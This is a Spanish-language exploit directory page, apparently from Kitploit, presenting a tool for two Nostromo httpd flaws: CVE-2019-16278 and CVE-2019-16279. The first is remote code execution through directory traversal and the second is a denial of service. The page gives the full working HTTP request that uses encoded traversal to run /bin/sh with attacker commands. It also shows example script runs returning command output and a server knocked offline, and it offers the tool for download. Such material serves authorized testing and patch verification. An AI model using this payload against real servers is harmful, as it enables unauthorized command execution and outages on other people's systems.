Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-16278 — De traversal de directorios a ejecución remota de código | Kitploit
Herramientas/GitHubGitHub/jas502n/cve-2019-16278
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebHerramienta de Acceso Remoto
GitHubjas502n/cve-2019-16278

CVE-2019-16278

De traversal de directorios a ejecución remota de código

Ver Repositorio
7027hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploits para CVE-2019-16278 y CVE-2019-16279

Nostromo httpd es propenso a 2 vulnerabilidades críticas para versiones <= 1.9.6 (0day =]) la primera es un RCE mediante directory transversal, la segunda es un DoS

CVE-2019-16278 - Directory transversal a ejecución remota de código

root@kitploit:~
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Content-Length: 25

echo
echo
ifconfig 2>&1

Este error se debe a una corrección incompleta para CVE-2011-0751. Podemos omitir una comprobación de /../ lo que nos permite ejecutar /bin/sh con argumentos arbitrarios.

Ejemplo

root@kitploit:~
$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)

CVE-2019-16279 - Denegación de Servicio

Este exploit aprovecha un error de memoria al enviar demasiados \r\n en una sola conexión.

Ejemplo

root@kitploit:~
$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

Enlaces de referencia:

https://git.sp0re.sh/sp0re/Nhttpd-exploits

Descargar herramienta